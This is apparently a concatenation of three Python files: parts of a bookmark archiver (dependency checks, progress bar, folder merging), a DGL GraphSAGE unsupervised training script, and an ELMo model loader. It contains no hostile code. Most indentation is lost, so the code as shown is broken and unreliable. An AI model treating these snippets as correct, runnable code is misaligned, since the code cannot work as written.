# parse chrome --version e.g. Google Chrome 61.0.3114.0 canary / Chromium 59.0.3029.110 built on Ubuntu, running on Ubuntu 16.04
try:
result = run([CHROME_BINARY, '--version'], stdout=PIPE)
version_str = result.stdout.decode('utf-8')
version_lines = re.sub("(Google Chrome|Chromium) (\\d+?)\\.(\\d+?)\\.(\\d+?).*?$", "\\2", version_str).split('\n')
version = [l for l in version_lines if l.isdigit()][-1]
if int(version) < 59:
print(version_lines)
print('{red}[X] Chrome version must be 59 or greater for headless PDF and screenshot saving{reset}'.format(**ANSI))
print(' See https://github.com/pirate/bookmark-archiver for help.')
raise SystemExit(1)
except (IndexError, TypeError, OSError):
print('{red}[X] Failed to parse Chrome version, is it installed properly?{reset}'.format(**ANSI))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format(CHROME_BINARY))
print(' See https://github.com/pirate/bookmark-archiver for help.')
raise SystemExit(1)
if FETCH_WGET:
if run(['which', 'wget'], stdout=DEVNULL).returncode or run(['wget', '--version'], stdout=DEVNULL).returncode:
print('{red}[X] Missing dependency: wget{reset}'.format(**ANSI))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format('wget'))
print(' See https://github.com/pirate/bookmark-archiver for help.')
raise SystemExit(1)
if FETCH_FAVICON or SUBMIT_ARCHIVE_DOT_ORG:
if run(['which', 'curl'], stdout=DEVNULL).returncode or run(['curl', '--version'], stdout=DEVNULL).returncode:
print('{red}[X] Missing dependency: curl{reset}'.format(**ANSI))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format('curl'))
print(' See https://github.com/pirate/bookmark-archiver for help.')
raise SystemExit(1)
if FETCH_AUDIO or FETCH_VIDEO:
if run(['which', 'youtube-dl'], stdout=DEVNULL).returncode or run(['youtube-dl', '--version'], stdout=DEVNULL).returncode:
print('{red}[X] Missing dependency: youtube-dl{reset}'.format(**ANSI))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format('youtube-dl'))
print(' See https://github.com/pirate/bookmark-archiver for help.')
raise SystemExit(1)
def chmod_file(path, cwd='.', permissions=ARCHIVE_PERMISSIONS, timeout=30):
"""chmod -R <permissions> <cwd>/<path>"""
if not os.path.exists(os.path.join(cwd, path)):
raise Exception('Failed to chmod: {} does not exist (did the previous step fail?)'.format(path))
chmod_result = run(['chmod', '-R', permissions, path], cwd=cwd, stdout=DEVNULL, stderr=PIPE, timeout=timeout)
if chmod_result.returncode == 1:
print(' ', chmod_result.stderr.decode())
raise Exception('Failed to chmod {}/{}'.format(cwd, path))
def progress(seconds=TIMEOUT, prefix=''):
"""Show a (subprocess-controlled) progress bar with a <seconds> timeout,
returns end() function to instantly finish the progress
"""
if not SHOW_PROGRESS:
return lambda: None
    chunk = '█' if sys.stdout.encoding == 'UTF-8' else '#'
chunks = TERM_WIDTH - len(prefix) - 20 # number of progress chunks to show (aka max bar width)
def progress_bar(seconds=seconds, prefix=prefix):
"""show timer in the form of progress bar, with percentage and seconds remaining"""
try:
for s in range(seconds * chunks):
progress = s / chunks / seconds * 100
bar_width = round(progress/(100/chunks))
                # ████████████████████ 0.9% (1/60sec)
sys.stdout.write('\r{0}{1}{2}{3} {4}% ({5}/{6}sec)'.format(
prefix,
ANSI['green'],
(chunk * bar_width).ljust(chunks),
ANSI['reset'],
round(progress, 1),
round(s/chunks),
seconds,
))
sys.stdout.flush()
time.sleep(1 / chunks)
            # ██████████████████████████████████ 100.0% (60/60sec)
sys.stdout.write('\r{0}{1}{2}{3} {4}% ({5}/{6}sec)\n'.format(
prefix,
ANSI['red'],
chunk * chunks,
ANSI['reset'],
100.0,
seconds,
seconds,
))
sys.stdout.flush()
except KeyboardInterrupt:
print()
pass
p = Process(target=progress_bar)
p.start()
def end():
"""immediately finish progress and clear the progressbar line"""
p.terminate()
sys.stdout.write('\r{}{}\r'.format((' ' * TERM_WIDTH), ANSI['reset'])) # clear whole terminal line
sys.stdout.flush()
return end
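# Illustrative usage of progress() (added for clarity, mirroring download_url
# below): start the bar before a slow step, then call end() as soon as the
# step finishes so the bar doesn't run out its full timeout:
#   end = progress(TIMEOUT, prefix='      ')
#   do_slow_step()  # hypothetical long-running call
#   end()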
def download_url(url):
"""download a given url's content into downloads/domain.txt"""
download_dir = os.path.join(ARCHIVE_DIR, 'downloads')
if not os.path.exists(download_dir):
os.makedirs(download_dir)
url_domain = url.split('/', 3)[2]
output_path = os.path.join(download_dir, '{}.txt'.format(url_domain))
print('[*] [{}] Downloading {} > {}'.format(
datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
url,
output_path,
))
end = progress(TIMEOUT, prefix=' ')
try:
downloaded_xml = requests.get(url).content.decode()
end()
except Exception as e:
end()
print('[!] Failed to download {}\n'.format(url))
print(' ', e)
raise SystemExit(1)
with open(output_path, 'w', encoding='utf-8') as f:
f.write(downloaded_xml)
return output_path
def str_between(string, start, end=None):
"""(<abc>12345</def>, <abc>, </def>) -> 12345"""
content = string.split(start, 1)[-1]
if end is not None:
content = content.rsplit(end, 1)[0]
return content
def get_link_type(link):
"""Certain types of links need to be handled specially, this figures out when that's the case"""
if link['base_url'].endswith('.pdf'):
return 'PDF'
    elif link['base_url'].rsplit('.', 1)[-1].lower() in ('pdf', 'png', 'jpg', 'jpeg', 'svg', 'bmp', 'gif', 'tiff', 'webp'):
return 'image'
elif 'wikipedia.org' in link['domain']:
return 'wiki'
elif 'youtube.com' in link['domain']:
return 'youtube'
elif 'soundcloud.com' in link['domain']:
return 'soundcloud'
elif 'youku.com' in link['domain']:
return 'youku'
elif 'vimeo.com' in link['domain']:
return 'vimeo'
return None
def merge_links(a, b):
"""deterministially merge two links, favoring longer field values over shorter,
and "cleaner" values over worse ones.
"""
longer = lambda key: a[key] if len(a[key]) > len(b[key]) else b[key]
earlier = lambda key: a[key] if a[key] < b[key] else b[key]
url = longer('url')
longest_title = longer('title')
cleanest_title = a['title'] if '://' not in a['title'] else b['title']
link = {
'timestamp': earlier('timestamp'),
'url': url,
'domain': domain(url),
'base_url': base_url(url),
'tags': longer('tags'),
'title': longest_title if '://' not in longest_title else cleanest_title,
'sources': list(set(a.get('sources', []) + b.get('sources', []))),
}
link['type'] = get_link_type(link)
return link
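# Worked example for merge_links (added for clarity; values are assumptions):
# merging two records of the same page keeps the earlier timestamp, the
# longer tags string, and the cleaner (URL-free) title:
#   a = {'timestamp': '1510000000', 'url': 'https://example.com/x',
#        'tags': 'a', 'title': 'Example'}
#   b = {'timestamp': '1520000000', 'url': 'https://example.com/x',
#        'tags': 'a,b', 'title': 'https://example.com/x'}
#   merge_links(a, b)  # -> timestamp '1510000000', tags 'a,b', title 'Example'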
def find_link(folder, links):
"""for a given archive folder, find the corresponding link object in links"""
url = parse_url(folder)
if url:
for link in links:
if (link['base_url'] in url) or (url in link['url']):
return link
timestamp = folder.split('.')[0]
for link in links:
if link['timestamp'].startswith(timestamp):
if link['domain'] in os.listdir(os.path.join(ARCHIVE_DIR, 'html/archive', folder)):
                    return link # careful now, this isn't safe for most people
if link['domain'] in parse_url(folder):
return link
return None
def parse_url(folder):
"""for a given archive folder, figure out what url it's for"""
link_json = os.path.join(ARCHIVE_DIR, 'html/archive', folder, 'index.json')
if os.path.exists(link_json):
with open(link_json, 'r') as f:
try:
link_json = f.read().strip()
if link_json:
link = json.loads(link_json)
return link['base_url']
except ValueError:
print('File contains invalid JSON: {}!'.format(link_json))
    archive_org_txt = os.path.join(ARCHIVE_DIR, 'html/archive', folder, 'archive.org.txt')
if os.path.exists(archive_org_txt):
with open(archive_org_txt, 'r') as f:
original_link = f.read().strip().split('/http', 1)[-1]
with_scheme = 'http{}'.format(original_link)
return with_scheme
return ''
def manually_merge_folders(source, target):
"""prompt for user input to resolve a conflict between two archive folders"""
if not IS_TTY:
return
fname = lambda path: path.split('/')[-1]
print(' {} and {} have conflicting files, which do you want to keep?'.format(fname(source), fname(target)))
print(' - [enter]: do nothing (keep both)')
print(' - a: prefer files from {}'.format(source))
print(' - b: prefer files from {}'.format(target))
print(' - q: quit and resolve the conflict manually')
try:
answer = input('> ').strip().lower()
except KeyboardInterrupt:
answer = 'q'
assert answer in ('', 'a', 'b', 'q'), 'Invalid choice.'
if answer == 'q':
print('\nJust run Bookmark Archiver again to pick up where you left off.')
raise SystemExit(0)
elif answer == '':
return
files_in_source = set(os.listdir(source))
files_in_target = set(os.listdir(target))
for file in files_in_source:
if file in files_in_target:
to_delete = target if answer == 'a' else source
run(['rm', '-Rf', os.path.join(to_delete, file)])
run(['mv', os.path.join(source, file), os.path.join(target, file)])
if not set(os.listdir(source)):
run(['rm', '-Rf', source])
def fix_folder_path(archive_path, link_folder, link):
"""given a folder, merge it to the canonical 'correct' path for the given link object"""
source = os.path.join(archive_path, link_folder)
target = os.path.join(archive_path, link['timestamp'])
url_in_folder = parse_url(source)
if not (url_in_folder in link['base_url']
or link['base_url'] in url_in_folder):
raise ValueError('The link does not match the url for this folder.')
if not os.path.exists(target):
# target doesn't exist so nothing needs merging, simply move A to B
run(['mv', source, target])
else:
# target folder exists, check for conflicting files and attempt manual merge
files_in_source = set(os.listdir(source))
files_in_target = set(os.listdir(target))
conflicting_files = files_in_source & files_in_target
if not conflicting_files:
for file in files_in_source:
run(['mv', os.path.join(source, file), os.path.join(target, file)])
if os.path.exists(source):
files_in_source = set(os.listdir(source))
if files_in_source:
manually_merge_folders(source, target)
else:
run(['rm', '-R', source])
def cleanup_archive(archive_path, links):
"""move any incorrectly named folders to their canonical locations"""
# for each folder that exists, see if we can match it up with a known good link
# if we can, then merge the two folders (TODO: if not, move it to lost & found)
unmatched = []
bad_folders = []
if not os.path.exists(archive_path):
return
for folder in os.listdir(archive_path):
try:
files = os.listdir(os.path.join(archive_path, folder))
except NotADirectoryError:
continue
if files:
link = find_link(folder, links)
if link is None:
unmatched.append(folder)
continue
if folder != link['timestamp']:
bad_folders.append((folder, link))
else:
# delete empty folders
run(['rm', '-R', os.path.join(archive_path, folder)])
if bad_folders and IS_TTY and input('[!] Cleanup archive? y/[n]: ') == 'y':
print('[!] Fixing {} improperly named folders in archive...'.format(len(bad_folders)))
for folder, link in bad_folders:
fix_folder_path(archive_path, folder, link)
elif bad_folders:
print('[!] Warning! {} folders need to be merged, fix by running bookmark archiver.'.format(len(bad_folders)))
if unmatched:
print('[!] Warning! {} unrecognized folders in html/archive/'.format(len(unmatched)))
print(' '+ '\n '.join(unmatched))
def wget_output_path(link, look_in=None):
"""calculate the path to the wgetted .html file, since wget may
adjust some paths to be different than the base_url path.
See docs on wget --adjust-extension (-E)
"""
urlencode = lambda s: quote(s, encoding='utf-8', errors='replace')
if link['type'] in ('PDF', 'image'):
return urlencode(link['base_url'])
    # Since the wget algorithm for -E (appending .html) is incredibly complex
# instead of trying to emulate it here, we just look in the output folder
# to see what html file wget actually created as the output
    wget_folder = link['base_url'].rsplit('/', 1)[0].split('/')
    if look_in is None:
        look_in = os.path.join(HTML_FOLDER, 'archive', link['timestamp'], *wget_folder)
    if look_in and os.path.exists(look_in):
html_files = [
f for f in os.listdir(look_in)
if re.search(".+\\.[Hh][Tt][Mm][Ll]?$", f, re.I | re.M)
]
if html_files:
return urlencode(os.path.join(*wget_folder, html_files[0]))
return None
# If finding the actual output file didn't work, fall back to the buggy
# implementation of the wget .html appending algorithm
# split_url = link['url'].split('#', 1)
# query = ('%3F' + link['url'].split('?', 1)[-1]) if '?' in link['url'] else ''
# if re.search(".+\\.[Hh][Tt][Mm][Ll]?$", split_url[0], re.I | re.M):
# # already ends in .html
# return urlencode(link['base_url'])
# else:
# # .html needs to be appended
# without_scheme = split_url[0].split('://', 1)[-1].split('?', 1)[0]
# if without_scheme.endswith('/'):
# if query:
# return urlencode('#'.join([without_scheme + 'index.html' + query + '.html', *split_url[1:]]))
# return urlencode('#'.join([without_scheme + 'index.html', *split_url[1:]]))
# else:
# if query:
# return urlencode('#'.join([without_scheme + '/index.html' + query + '.html', *split_url[1:]]))
# elif '/' in without_scheme:
# return urlencode('#'.join([without_scheme + '.html', *split_url[1:]]))
# return urlencode(link['base_url'] + '/index.html')
def derived_link_info(link):
"""extend link info with the archive urls and other derived data"""
link_info = {
**link,
'date': datetime.fromtimestamp(float(link['timestamp'])).strftime('%Y-%m-%d %H:%M'),
'google_favicon_url': 'https://www.google.com/s2/favicons?domain={domain}'.format(**link),
'favicon_url': 'archive/{timestamp}/favicon.ico'.format(**link),
'files_url': 'archive/{timestamp}/index.html'.format(**link),
'archive_url': 'archive/{}/{}'.format(link['timestamp'], wget_output_path(link)),
'pdf_link': 'archive/{timestamp}/output.pdf'.format(**link),
'screenshot_link': 'archive/{timestamp}/screenshot.png'.format(**link),
'archive_org_url': 'https://web.archive.org/web/{base_url}'.format(**link),
}
# PDF and images are handled slightly differently
# wget, screenshot, & pdf urls all point to the same file
if link['type'] in ('PDF', 'image'):
link_info.update({
'archive_url': 'archive/{timestamp}/{base_url}'.format(**link),
'pdf_link': 'archive/{timestamp}/{base_url}'.format(**link),
'screenshot_link': 'archive/{timestamp}/{base_url}'.format(**link),
'title': '{title} ({type})'.format(**link),
})
return link_info
|
train_sampling_unsupervised.py | import dgl
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.multiprocessing as mp
from torch.utils.data import DataLoader
import dgl.function as fn
import dgl.nn.pytorch as dglnn
import time
import argparse
from _thread import start_new_thread
from functools import wraps
from dgl.data import RedditDataset
from torch.nn.parallel import DistributedDataParallel
import tqdm
import traceback
import sklearn.linear_model as lm
import sklearn.metrics as skm
from utils import thread_wrapped_func
#### Negative sampler
class NegativeSampler(object):
def __init__(self, g):
self.weights = g.in_degrees().float() ** 0.75
def __call__(self, num_samples):
return self.weights.multinomial(num_samples, replacement=True)
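# A minimal usage sketch (``g`` is any DGLGraph; the names are illustrative):
# nodes are drawn with probability proportional to in_degree ** 0.75, the
# word2vec-style unigram distribution.
# neg_sampler = NegativeSampler(g)
# neg_nodes = neg_sampler(256)  # LongTensor of 256 node IDs, sampled with replacement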
#### Neighbor sampler
class NeighborSampler(object):
def __init__(self, g, fanouts, num_negs, neg_share=False):
self.g = g
self.fanouts = fanouts
self.neg_sampler = NegativeSampler(g)
self.num_negs = num_negs
self.neg_share = neg_share
def sample_blocks(self, seed_edges):
n_edges = len(seed_edges)
seed_edges = th.LongTensor(np.asarray(seed_edges))
heads, tails = self.g.find_edges(seed_edges)
if self.neg_share and n_edges % self.num_negs == 0:
neg_tails = self.neg_sampler(n_edges)
neg_tails = neg_tails.view(-1, 1, self.num_negs).expand(n_edges//self.num_negs,
self.num_negs,
self.num_negs).flatten()
neg_heads = heads.view(-1, 1).expand(n_edges, self.num_negs).flatten()
else:
neg_tails = self.neg_sampler(self.num_negs * n_edges)
neg_heads = heads.view(-1, 1).expand(n_edges, self.num_negs).flatten()
# Maintain the correspondence between heads, tails and negative tails as two
# graphs.
# pos_graph contains the correspondence between each head and its positive tail.
# neg_graph contains the correspondence between each head and its negative tails.
# Both pos_graph and neg_graph are first constructed with the same node space as
# the original graph. Then they are compacted together with dgl.compact_graphs.
pos_graph = dgl.graph((heads, tails), num_nodes=self.g.number_of_nodes())
neg_graph = dgl.graph((neg_heads, neg_tails), num_nodes=self.g.number_of_nodes())
pos_graph, neg_graph = dgl.compact_graphs([pos_graph, neg_graph])
# Obtain the node IDs being used in either pos_graph or neg_graph. Since they
# are compacted together, pos_graph and neg_graph share the same compacted node
# space.
seeds = pos_graph.ndata[dgl.NID]
blocks = []
for fanout in self.fanouts:
# For each seed node, sample ``fanout`` neighbors.
frontier = dgl.sampling.sample_neighbors(self.g, seeds, fanout, replace=True)
# Remove all edges between heads and tails, as well as heads and neg_tails.
_, _, edge_ids = frontier.edge_ids(
th.cat([heads, tails, neg_heads, neg_tails]),
th.cat([tails, heads, neg_tails, neg_heads]),
return_uv=True)
frontier = dgl.remove_edges(frontier, edge_ids)
# Then we compact the frontier into a bipartite graph for message passing.
block = dgl.to_block(frontier, seeds)
# Pre-generate the CSR format so that it can be used in training directly.
block.in_degree(0)
# Obtain the seed nodes for next layer.
seeds = block.srcdata[dgl.NID]
blocks.insert(0, block)
return pos_graph, neg_graph, blocks
def load_subtensor(g, input_nodes, device):
"""
Copies the features of a set of nodes onto the given device.
"""
batch_inputs = g.ndata['features'][input_nodes].to(device)
return batch_inputs
class SAGE(nn.Module):
def __init__(self,
in_feats,
n_hidden,
n_classes,
n_layers,
activation,
dropout):
super().__init__()
self.n_layers = n_layers
self.n_hidden = n_hidden
self.n_classes = n_classes
self.layers = nn.ModuleList()
self.layers.append(dglnn.SAGEConv(in_feats, n_hidden, 'mean'))
for i in range(1, n_layers - 1):
self.layers.append(dglnn.SAGEConv(n_hidden, n_hidden, 'mean'))
self.layers.append(dglnn.SAGEConv(n_hidden, n_classes, 'mean'))
self.dropout = nn.Dropout(dropout)
self.activation = activation
def forward(self, blocks, x):
h = x
for l, (layer, block) in enumerate(zip(self.layers, blocks)):
h = layer(block, h)
if l != len(self.layers) - 1:
h = self.activation(h)
h = self.dropout(h)
return h
def inference(self, g, x, batch_size, device):
"""
Inference with the GraphSAGE model on full neighbors (i.e. without neighbor sampling).
g : the entire graph.
x : the input of entire node set.
The inference code is written so that it can handle any number of nodes and
layers.
"""
# During inference with sampling, multi-layer blocks are very inefficient because
# lots of computations in the first few layers are repeated.
# Therefore, we compute the representation of all nodes layer by layer. The nodes
# on each layer are of course split into batches.
# TODO: can we standardize this?
nodes = th.arange(g.number_of_nodes())
for l, layer in enumerate(self.layers):
y = th.zeros(g.number_of_nodes(), self.n_hidden if l != len(self.layers) - 1 else self.n_classes)
for start in tqdm.trange(0, len(nodes), batch_size):
end = start + batch_size
batch_nodes = nodes[start:end]
block = dgl.to_block(dgl.in_subgraph(g, batch_nodes), batch_nodes)
block = block.to(device)
input_nodes = block.srcdata[dgl.NID]
h = x[input_nodes].to(device)
h = layer(block, h)
if l != len(self.layers) - 1:
h = self.activation(h)
h = self.dropout(h)
y[start:end] = h.cpu()
x = y
return y
class CrossEntropyLoss(nn.Module):
def forward(self, block_outputs, pos_graph, neg_graph):
with pos_graph.local_scope():
pos_graph.ndata['h'] = block_outputs
pos_graph.apply_edges(fn.u_dot_v('h', 'h', 'score'))
pos_score = pos_graph.edata['score']
with neg_graph.local_scope():
neg_graph.ndata['h'] = block_outputs
neg_graph.apply_edges(fn.u_dot_v('h', 'h', 'score'))
neg_score = neg_graph.edata['score']
score = th.cat([pos_score, neg_score])
label = th.cat([th.ones_like(pos_score), th.zeros_like(neg_score)]).long()
loss = F.binary_cross_entropy_with_logits(score, label.float())
return loss
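# A worked sketch of the loss above (hypothetical scores, not training code):
# pos_score = th.tensor([2.0, 1.5])   # u.v for observed edges -> label 1
# neg_score = th.tensor([-1.0, 0.3])  # u.v for sampled non-edges -> label 0
# score = th.cat([pos_score, neg_score])
# label = th.cat([th.ones_like(pos_score), th.zeros_like(neg_score)])
# F.binary_cross_entropy_with_logits(score, label)  # scalar logistic loss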
def compute_acc(emb, labels, train_nids, val_nids, test_nids):
"""
Compute the accuracy of prediction given the labels.
"""
emb = emb.cpu().numpy()
train_nids = train_nids.cpu().numpy()
train_labels = labels[train_nids].cpu().numpy()
val_nids = val_nids.cpu().numpy()
val_labels = labels[val_nids].cpu().numpy()
test_nids = test_nids.cpu().numpy()
test_labels = labels[test_nids].cpu().numpy()
emb = (emb - emb.mean(0, keepdims=True)) / emb.std(0, keepdims=True)
lr = lm.LogisticRegression(multi_class='multinomial', max_iter=10000)
lr.fit(emb[train_nids], train_labels)
pred = lr.predict(emb)
f1_micro_eval = skm.f1_score(val_labels, pred[val_nids], average='micro')
f1_micro_test = skm.f1_score(test_labels, pred[test_nids], average='micro')
f1_macro_eval = skm.f1_score(val_labels, pred[val_nids], average='macro')
f1_macro_test = skm.f1_score(test_labels, pred[test_nids], average='macro')
return f1_micro_eval, f1_micro_test
def evaluate(model, g, inputs, labels, train_nids, val_nids, test_nids, batch_size, device):
"""
Evaluate the model on the validation and test sets.
g : The entire graph.
inputs : The features of all the nodes.
labels : The labels of all the nodes.
train_nids/val_nids/test_nids : Node IDs of the train/validation/test sets.
batch_size : Number of nodes to compute at the same time.
device : The GPU device to evaluate on.
"""
model.eval()
with th.no_grad():
# single gpu
if isinstance(model, SAGE):
pred = model.inference(g, inputs, batch_size, device)
# multi gpu
else:
pred = model.module.inference(g, inputs, batch_size, device)
model.train()
return compute_acc(pred, labels, train_nids, val_nids, test_nids)
#### Entry point
def run(proc_id, n_gpus, args, devices, data):
# Unpack data
device = devices[proc_id]
if n_gpus > 1:
dist_init_method = 'tcp://{master_ip}:{master_port}'.format(
master_ip='127.0.0.1', master_port='12345')
world_size = n_gpus
th.distributed.init_process_group(backend="nccl",
init_method=dist_init_method,
world_size=world_size,
rank=proc_id)
train_mask, val_mask, test_mask, in_feats, labels, n_classes, g = data
train_nid = th.LongTensor(np.nonzero(train_mask)[0])
val_nid = th.LongTensor(np.nonzero(val_mask)[0])
test_nid = th.LongTensor(np.nonzero(test_mask)[0])
# Create sampler
sampler = NeighborSampler(g, [int(fanout) for fanout in args.fan_out.split(',')], args.num_negs, args.neg_share)
# Create PyTorch DataLoader for constructing blocks
train_seeds = np.arange(g.number_of_edges())
if n_gpus > 0:
num_per_gpu = (train_seeds.shape[0] + n_gpus -1) // n_gpus
train_seeds = train_seeds[proc_id * num_per_gpu :
(proc_id + 1) * num_per_gpu \
if (proc_id + 1) * num_per_gpu < train_seeds.shape[0]
else train_seeds.shape[0]]
dataloader = DataLoader(
dataset=train_seeds,
batch_size=args.batch_size,
collate_fn=sampler.sample_blocks,
shuffle=True,
drop_last=False,
pin_memory=True,
num_workers=args.num_workers)
# Define model and optimizer
model = SAGE(in_feats, args.num_hidden, args.num_hidden, args.num_layers, F.relu, args.dropout)
model = model.to(device)
if n_gpus > 1:
model = DistributedDataParallel(model, device_ids=[device], output_device=device)
loss_fcn = CrossEntropyLoss()
loss_fcn = loss_fcn.to(device)
optimizer = optim.Adam(model.parameters(), lr=args.lr)
# Training loop
avg = 0
iter_pos = []
iter_neg = []
iter_d = []
iter_t = []
best_eval_acc = 0
best_test_acc = 0
for epoch in range(args.num_epochs):
tic = time.time()
# Loop over the dataloader to sample the computation dependency graph as a list of
# blocks.
tic_step = time.time()
for step, (pos_graph, neg_graph, blocks) in enumerate(dataloader):
# The input nodes lie on the LHS of the first block.
# The output nodes lie on the RHS of the last block.
input_nodes = blocks[0].srcdata[dgl.NID]
batch_inputs = load_subtensor(g, input_nodes, device)
d_step = time.time()
pos_graph = pos_graph.to(device)
neg_graph = neg_graph.to(device)
blocks = [block.to(device) for block in blocks]
# Compute loss and prediction
batch_pred = model(blocks, batch_inputs)
loss = loss_fcn(batch_pred, pos_graph, neg_graph)
optimizer.zero_grad()
loss.backward()
optimizer.step()
t = time.time()
pos_edges = pos_graph.number_of_edges()
neg_edges = neg_graph.number_of_edges()
iter_pos.append(pos_edges / (t - tic_step))
iter_neg.append(neg_edges / (t - tic_step))
iter_d.append(d_step - tic_step)
iter_t.append(t - d_step)
if step % args.log_every == 0:
gpu_mem_alloc = th.cuda.max_memory_allocated() / 1000000 if th.cuda.is_available() else 0
print('[{}]Epoch {:05d} | Step {:05d} | Loss {:.4f} | Speed (samples/sec) {:.4f}|{:.4f} | Load {:.4f}| train {:.4f} | GPU {:.1f} MiB'.format(
proc_id, epoch, step, loss.item(), np.mean(iter_pos[3:]), np.mean(iter_neg[3:]), np.mean(iter_d[3:]), np.mean(iter_t[3:]), gpu_mem_alloc))
tic_step = time.time()
if step % args.eval_every == 0 and proc_id == 0:
eval_acc, test_acc = evaluate(model, g, g.ndata['features'], labels, train_nid, val_nid, test_nid, args.batch_size, device)
print('Eval Acc {:.4f} Test Acc {:.4f}'.format(eval_acc, test_acc))
if eval_acc > best_eval_acc:
best_eval_acc = eval_acc
best_test_acc = test_acc
print('Best Eval Acc {:.4f} Test Acc {:.4f}'.format(best_eval_acc, best_test_acc))
# Accumulate per-epoch time, skipping the first 5 warm-up epochs (hence epoch - 4 below).
toc = time.time()
if epoch >= 5:
avg += toc - tic
if n_gpus > 1:
th.distributed.barrier()
print('Avg epoch time: {}'.format(avg / (epoch - 4)))
def main(args, devices):
# load reddit data
data = RedditDataset(self_loop=True)
train_mask = data.train_mask
val_mask = data.val_mask
test_mask = data.test_mask
features = th.Tensor(data.features)
in_feats = features.shape[1]
labels = th.LongTensor(data.labels)
n_classes = data.num_labels
# Construct graph
g = dgl.graph(data.graph.all_edges())
g.ndata['features'] = features
# Pack data
data = train_mask, val_mask, test_mask, in_feats, labels, n_classes, g
n_gpus = len(devices)
if devices[0] == -1:
run(0, 0, args, ['cpu'], data)
elif n_gpus == 1:
run(0, n_gpus, args, devices, data)
else:
procs = []
for proc_id in range(n_gpus):
p = mp.Process(target=thread_wrapped_func(run),
args=(proc_id, n_gpus, args, devices, data))
p.start()
procs.append(p)
for p in procs:
p.join()
if __name__ == '__main__':
argparser = argparse.ArgumentParser("multi-gpu training")
argparser.add_argument("--gpu", type=str, default='0',
help="GPU, can be a list of gpus for multi-gpu trianing, e.g., 0,1,2,3; -1 for CPU")
argparser.add_argument('--num-epochs', type=int, default=20)
argparser.add_argument('--num-hidden', type=int, default=16)
argparser.add_argument('--num-layers', type=int, default=2)
argparser.add_argument('--num-negs', type=int, default=1)
argparser.add_argument('--neg-share', default=False, action='store_true',
help="sharing neg nodes for positive nodes")
argparser.add_argument('--fan-out', type=str, default='10,25')
argparser.add_argument('--batch-size', type=int, default=10000)
argparser.add_argument('--log-every', type=int, default=20)
argparser.add_argument('--eval-every', type=int, default=1000)
argparser.add_argument('--lr', type=float, default=0.003)
argparser.add_argument('--dropout', type=float, default=0.5)
argparser.add_argument('--num-workers', type=int, default=0,
help="Number of sampling processes. Use 0 for no extra process.")
args = argparser.parse_args()
devices = list(map(int, args.gpu.split(',')))
main(args, devices)
|
elmo_factory.py | import os
from pathlib import Path
from allennlp.commands.elmo import ElmoEmbedder
from logging import getLogger
import owncloud
import threading
from enum import Enum
from src.cloud.cloud_connection import CloudConnection
class FileStatus(Enum):
Fetching = 1
Ready = 2
class ELMoFactory:
__logger = getLogger(__name__)
__RESOURCE_PATH = (Path.cwd() / "src/resources/models").resolve()
__OPTIONS_PATH = (__RESOURCE_PATH / "elmo_2x4096_512_2048cnn_2xhighway_5.5B_options.json").resolve()
__DEFAULT_WEIGHT_FILE = "elmo_2x4096_512_2048cnn_2xhighway_5.5B_weights.hdf5"
ELMo_models_cache = {}
ELMo_to_status = {__DEFAULT_WEIGHT_FILE: FileStatus.Ready}
ELMo_to_last_updated = {}
cloud = CloudConnection.get_cloud_connection()
def __init__(self):
pass
@staticmethod
def __fetch_remote_model(file_name):
try:
ELMoFactory.__logger.info("fetching remote model {}".format(file_name))
if file_name in ELMoFactory.ELMo_to_status and ELMoFactory.ELMo_to_status[file_name] == FileStatus.Fetching:
return
ELMoFactory.ELMo_to_status[file_name] = FileStatus.Fetching
if os.path.exists((ELMoFactory.__RESOURCE_PATH / file_name).resolve()):
os.remove((ELMoFactory.__RESOURCE_PATH / file_name).resolve())
success = ELMoFactory.cloud.get_file(CloudConnection.remote_models_path + "/" + file_name,
(ELMoFactory.__RESOURCE_PATH / file_name).resolve())
if success:
ELMoFactory.ELMo_to_status[file_name] = FileStatus.Ready
ELMoFactory.ELMo_to_last_updated[file_name] = ELMoFactory.__fetch_remote_model_update_time(file_name)
if file_name in ELMoFactory.ELMo_models_cache:
del ELMoFactory.ELMo_models_cache[file_name]
ELMoFactory.__logger.info("successfully loaded remote model {}".format(file_name))
else:
del ELMoFactory.ELMo_to_status[file_name]
ELMoFactory.__logger.info("model {} was not found remotely".format(file_name))
except owncloud.HTTPResponseError:
del ELMoFactory.ELMo_to_status[file_name]
ELMoFactory.__logger.error("unable to load model {}".format(file_name))
@staticmethod
def __fetch_remote_model_update_time(file_name):
try:
info = ELMoFactory.cloud.file_info(CloudConnection.remote_models_path + "/" + file_name)
if info is not None:
ELMoFactory.__logger.info("successfully loaded metadata of model {}".format(file_name))
return info.get_last_modified()
else:
ELMoFactory.__logger.info("model {} was not found remotely".format(file_name))
except owncloud.HTTPResponseError:
ELMoFactory.__logger.error("unable to load metadata of model {}".format(file_name))
return None
@staticmethod
def __update_model(file_name):
if ELMoFactory.ELMo_to_last_updated[file_name] != ELMoFactory.__fetch_remote_model_update_time(file_name):
ELMoFactory.__fetch_remote_model(file_name)
@staticmethod
def __course_id_to_file_name(course_id):
file_name = "weights_course_{}.hdf5".format(course_id)
if file_name not in ELMoFactory.ELMo_to_status:
thr = threading.Thread(target=ELMoFactory.__fetch_remote_model, args=(file_name,))
thr.start()
return ELMoFactory.__DEFAULT_WEIGHT_FILE
if ELMoFactory.ELMo_to_status[file_name] == FileStatus.Ready and \
(ELMoFactory.__RESOURCE_PATH / file_name).resolve().exists():
thr = threading.Thread(target=ELMoFactory.__update_model, args=(file_name,))
thr.start()
return file_name
return ELMoFactory.__DEFAULT_WEIGHT_FILE
def get_model_for_course(self, course_id=None):
if course_id is None:
model_name = self.__DEFAULT_WEIGHT_FILE
else:
model_name = ELMoFactory.__course_id_to_file_name(course_id)
if model_name not in ELMoFactory.ELMo_models_cache:
weights_path = (self.__RESOURCE_PATH / model_name).resolve()
try:
ELMoFactory.ELMo_models_cache[model_name] = ElmoEmbedder(ELMoFactory.__OPTIONS_PATH, weights_path)
except FileNotFoundError:
self.__logger.error("Model not found, Using default elmo model")
return ElmoEmbedder(ELMoFactory.__OPTIONS_PATH, self.__DEFAULT_WEIGHT_FILE)
self.__logger.info("Using the ELMo Model {}".format(model_name))
return ELMoFactory.ELMo_models_cache[model_name]
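# Usage sketch (the course id is hypothetical): returns a cached ElmoEmbedder,
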